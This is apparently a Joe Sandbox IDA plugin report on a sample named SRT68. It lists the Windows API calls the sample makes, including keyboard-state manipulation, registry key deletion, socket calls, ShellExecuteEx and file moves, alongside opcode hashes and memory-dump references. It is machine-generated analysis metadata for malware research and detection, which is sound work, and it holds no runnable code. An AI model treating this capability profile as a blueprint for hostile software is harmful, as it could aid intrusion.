                                                                      Similarity
                                                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3479070676-0
                                                                      • Opcode ID: 3a668c07f4865e9070e79f1a65ddcb3b3d1c2687f5e26eba5c4abac0e4a4d4d3
                                                                      • Instruction ID: 37e7a7a203bc4cbd23e79523fb4be66fdb884d642f119f156ffa65e4d6000574
                                                                      • Opcode Fuzzy Hash: 3a668c07f4865e9070e79f1a65ddcb3b3d1c2687f5e26eba5c4abac0e4a4d4d3
                                                                      • Instruction Fuzzy Hash: 80A180712042029FDB10EF18CC90F6EBBE5AF45314F14841CF9969B292DB79E949DF41
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FA2ACF
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FA2B17
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC21A
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC286
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 26c1ff5b1fa326d4aa158779978073628c37822ca70ddcc3fcef75fdd2210497
                                                                      • Instruction ID: 667715faa497d45fee4e0aa471e90f4e7316cce3bb68e9f605b045672d765ef2
                                                                      • Opcode Fuzzy Hash: 26c1ff5b1fa326d4aa158779978073628c37822ca70ddcc3fcef75fdd2210497
                                                                      • Instruction Fuzzy Hash: 1141F172B046819BC7B55B3C9D8CB6B7BA3BF87360F28841DE08786551C67D9841F750
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 010070DD
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01007114
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 01007130
                                                                      • _memmove.LIBCMT ref: 0100717E
                                                                      • _memmove.LIBCMT ref: 0100719B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 010071AA
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010071BF
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 010071DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 256516436-0
                                                                      • Opcode ID: ec20159420a37bdb7451f6d05f8f2ad1acda81a485177396f55971d349f8fe82
                                                                      • Instruction ID: e007fecae62ec2fb96e0204e2cbf577b506ef59c35f14d0cb598dfadd101abb1
                                                                      • Opcode Fuzzy Hash: ec20159420a37bdb7451f6d05f8f2ad1acda81a485177396f55971d349f8fe82
                                                                      • Instruction Fuzzy Hash: E931B231900206EBDF10DFA4DD85EAFB7B9FF45300F2440A9F9449B286DB38AA15DB60
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 010261EB
                                                                      • GetDC.USER32(00000000), ref: 010261F3
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010261FE
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0102620A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01026246
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01026257
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0102902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01026291
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010262B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 4e238a4e0ffd986b8cf2c2a3b078ddb9e9c9613d8881e5d2d6d94ce8c0c2be60
                                                                      • Instruction ID: 913de54fd662d060799aff36df20407c4be7d0e0e99b96f8a14122cde41d30dc
                                                                      • Opcode Fuzzy Hash: 4e238a4e0ffd986b8cf2c2a3b078ddb9e9c9613d8881e5d2d6d94ce8c0c2be60
                                                                      • Instruction Fuzzy Hash: 59319F721012107FEB218F64CC8AFEB3FA9EF4A7A5F140055FE889A181C67A9841CB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 5f7b61526a557e75de2d7dfa7a62d942689ecd08c4074409e1b0e3b09e19c6f5
                                                                      • Instruction ID: 2d8af95b3ac3ad00020ab47245565ac5b40882939be51705c89a3f8c024391ef
                                                                      • Opcode Fuzzy Hash: 5f7b61526a557e75de2d7dfa7a62d942689ecd08c4074409e1b0e3b09e19c6f5
                                                                      • Instruction Fuzzy Hash: AD21CC6160120E77F608B612DE43FFB775DAE96358F044018FF049A617FB58DE25B2A1
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                      • _wcstok.LIBCMT ref: 0100EC94
                                                                      • _wcscpy.LIBCMT ref: 0100ED23
                                                                      • _memset.LIBCMT ref: 0100ED56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 774024439-3081909835
                                                                      • Opcode ID: a180bb2c967673b5ab36a7dcbe1abc1efa3ecb4320923934868bed5d417bddb2
                                                                      • Instruction ID: e8f905650a33b031ff43b5d198b5198f7472c1a59c292e478a7ded02c0b8f063
                                                                      • Opcode Fuzzy Hash: a180bb2c967673b5ab36a7dcbe1abc1efa3ecb4320923934868bed5d417bddb2
                                                                      • Instruction Fuzzy Hash: 23C19DB05083419FD755EF28CC81E6BB7E0EF86310F04492DF9999B2A2DB74E805DB92
                                                                      APIs
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01016C00
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01016C21
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 01016C34
                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 01016CEA
                                                                      • inet_ntoa.WSOCK32(?), ref: 01016CA7
                                                                        • Part of subcall function 00FFA7E9: _strlen.LIBCMT ref: 00FFA7F3
                                                                        • Part of subcall function 00FFA7E9: _memmove.LIBCMT ref: 00FFA815
                                                                      • _strlen.LIBCMT ref: 01016D44
                                                                      • _memmove.LIBCMT ref: 01016DAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3619996494-0
                                                                      • Opcode ID: 7236b3f7cf126339f7ab7454c3317ff0d89accc0d7395204f5e0cad600c42de8
                                                                      • Instruction ID: 1e252d36f42c8faa1521c0b64e4eef0767b6cb668ebf4ef0517c5ff2e6d339f8
                                                                      • Opcode Fuzzy Hash: 7236b3f7cf126339f7ab7454c3317ff0d89accc0d7395204f5e0cad600c42de8
                                                                      • Instruction Fuzzy Hash: EE81D1B1508300ABD710EF28CC82E6FB7E8AF85714F44491CF9969B292DBB9DD45CB52
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9a56be9b8bc7835868ad5ad0500c022a10c4c25d334b775be9c92be452eb26f
                                                                      • Instruction ID: 036475ade1cd459a832e0d3324d4cd58488499731c7407b1c2110c0d5a6c5829
                                                                      • Opcode Fuzzy Hash: b9a56be9b8bc7835868ad5ad0500c022a10c4c25d334b775be9c92be452eb26f
                                                                      • Instruction Fuzzy Hash: 18719F71904109EFCB14CF98CC44EBEBB75FF8A360F258149F915AA251C734AA51DF60
                                                                      APIs
                                                                      • IsWindow.USER32(015855C0), ref: 0102B3EB
                                                                      • IsWindowEnabled.USER32(015855C0), ref: 0102B3F7
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0102B4DB
                                                                      • SendMessageW.USER32(015855C0,000000B0,?,?), ref: 0102B512
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0102B54F
                                                                      • GetWindowLongW.USER32(015855C0,000000EC), ref: 0102B571
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0102B589
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: 8589def97e8e8f46742a53010930c0a9ceb0621b8286fa279f75d11b1683cb4e
                                                                      • Instruction ID: 0609c386fcf8abcedee6d367954e9659ba1b6070b1420e6a7f1bb316c3217010
                                                                      • Opcode Fuzzy Hash: 8589def97e8e8f46742a53010930c0a9ceb0621b8286fa279f75d11b1683cb4e
                                                                      • Instruction Fuzzy Hash: 37718F34604225AFEB759F68C8D4FBA7BF9FF09340F148099EAC597261CB36A940DB50
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0101F448
                                                                      • _memset.LIBCMT ref: 0101F511
                                                                      • ShellExecuteExW.SHELL32(?), ref: 0101F556
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                      • GetProcessId.KERNEL32(00000000), ref: 0101F5CD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0101F5FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                      • String ID: @
                                                                      • API String ID: 3522835683-2766056989
                                                                      • Opcode ID: e5eba1f688b7feea2325dbf51401fb9c204bdf709ccb69a81037239d9487e98f
                                                                      • Instruction ID: beeb22add71846dd561545a583d3c3dfec17139c650440817fa050b6c383dc16
                                                                      • Opcode Fuzzy Hash: e5eba1f688b7feea2325dbf51401fb9c204bdf709ccb69a81037239d9487e98f
                                                                      • Instruction Fuzzy Hash: CF61C0B1A0061ADFCB14DF68C8819AEBBF5FF49310F148069E856AB351CB78AD45DF90
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 01000F8C
                                                                      • GetKeyboardState.USER32(?), ref: 01000FA1
                                                                      • SetKeyboardState.USER32(?), ref: 01001002
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 01001030
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0100104F
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 01001095
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010010B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: f7c72fa2142d1814ba6c5bd6ca6da58a6d7fa231a7454290cee26cbfe92566bc
                                                                      • Instruction ID: 8d528ebbc8696f1ade33b70bc75142b4e68785861a8174881bece13b37317f32
                                                                      • Opcode Fuzzy Hash: f7c72fa2142d1814ba6c5bd6ca6da58a6d7fa231a7454290cee26cbfe92566bc
                                                                      • Instruction Fuzzy Hash: C451C3B06086D639FB3786388845BBABEE95B06344F0885CDF2D4468C3C2E9E8D8D751
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 01000DA5
                                                                      • GetKeyboardState.USER32(?), ref: 01000DBA
                                                                      • SetKeyboardState.USER32(?), ref: 01000E1B
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01000E47
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01000E64
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01000EA8
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01000EC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: e1aec8469f27df977367b8bbca7cbd10fe1428a898561eb613ad6901ecdb3a4a
                                                                      • Instruction ID: e4834daffa0b993d6a236c0d363b90b027ad4cb369b5f25c8c8ce0107163880c
                                                                      • Opcode Fuzzy Hash: e1aec8469f27df977367b8bbca7cbd10fe1428a898561eb613ad6901ecdb3a4a
                                                                      • Instruction Fuzzy Hash: 2451F6A05087D63DFB3386388C45BBA7EE95B06380F0884CDF2D5568C6C395E898E760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 2945705084-0
                                                                      • Opcode ID: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
                                                                      • Instruction ID: 91977aee791a2e7c879593fb8ea430bbc4009b1ffd8f86a93264e39ac75395f1
                                                                      • Opcode Fuzzy Hash: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
                                                                      • Instruction Fuzzy Hash: 6A41E765C5020976DB11EBB48C47ECFB7B8AF04350F40885AE649E3161EB38A745D7A6
                                                                      APIs
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 010036B7
                                                                      • _wcscmp.LIBCMT ref: 010036D3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 010036EB
                                                                      • _wcscat.LIBCMT ref: 01003733
                                                                      • SHFileOperationW.SHELL32(?), ref: 0100379F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 1377345388-1173974218
                                                                      • Opcode ID: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
                                                                      • Instruction ID: 76ee8ee813b8757e906c3c87652b27bd48d18dd021c60cc8e887d8821d5e95f3
                                                                      • Opcode Fuzzy Hash: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
                                                                      • Instruction Fuzzy Hash: D5418171508345AEE763EF64D841ADF77E8BF89280F00486EF5C9C7291EA34D289C756
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 010272AA
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027351
                                                                      • IsMenu.USER32(?), ref: 01027369
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010273B1
                                                                      • DrawMenuBar.USER32 ref: 010273C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                      • String ID: 0
                                                                      • API String ID: 3866635326-4108050209
                                                                      • Opcode ID: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
                                                                      • Instruction ID: 92bbbfb3f10fb5ee84cae0c7c95f1bb8f9b51bd00b89700fd07be54b563e0806
                                                                      • Opcode Fuzzy Hash: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
                                                                      • Instruction Fuzzy Hash: 94415975A00219EFDB20DF54D885E9ABBF8FF18350F14846AFE85A7250D735A950CF90
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01020FD4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01020FFE
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 010210B5
                                                                        • Part of subcall function 01020FA5: RegCloseKey.ADVAPI32(?), ref: 0102101B
                                                                        • Part of subcall function 01020FA5: FreeLibrary.KERNEL32(?), ref: 0102106D
                                                                        • Part of subcall function 01020FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01021090
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 01021058
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
